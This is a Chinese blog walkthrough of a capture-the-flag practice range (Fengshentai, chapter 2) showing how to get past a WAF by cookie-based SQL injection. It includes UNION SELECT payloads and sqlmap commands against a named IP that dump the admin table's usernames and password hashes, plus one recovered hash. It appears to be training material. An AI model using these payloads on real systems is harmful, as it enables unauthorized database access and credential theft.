封神台靶场-第二章

第二章:遇到阻难!绕过WAF过滤

1.查找有无sql注入点利用and 1=1发现做了过滤
在这里插入图片描述
使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10
在这里插入图片描述
2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过:
这里我们使用一个小工具进行注入(火狐插件)
在这里插入图片描述
这款工具可以自定义请求头响应头(Request header,Reponse header)
打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空格用+表示)
在这里插入图片描述
3.使用联合查询
这里我们做了猜测一般表名为admin,猜测尝试字段(admin,password,)

查询语句结果
id=1171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin查看回显
id=1171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin查询字段值

注意:这里id必须为假才会执行后面的语句
在这里插入图片描述
回显位置:2/3
在这里插入图片描述
3.字段值(admin:b9a2a2b5dffb918c)
在这里插入图片描述
4.用御剑后台扫描器扫描查找网站后台
在这里插入图片描述
5.登录后台拿到flag
在这里插入图片描述

kali-sqlmap

1.sqlmap cookie注入用法
sqlmap -u [url] --cokie [id=] --[table|dbs|columns] --level [2] --batch

sqlmap-cookie注入查询
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” --table --level 2查表
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin --columns --level 2指定表查字段
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin -C username,password --dump --level 2制定字段查值

1.查表
在这里插入图片描述
这里到查到一半出来了我就结束了在这里插入图片描述
2. 查字段
在这里插入图片描述
在这里插入图片描述
3. 查字段值
在这里插入图片描述
这里到查到一半出来了我就结束了
在这里插入图片描述

  • 7
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值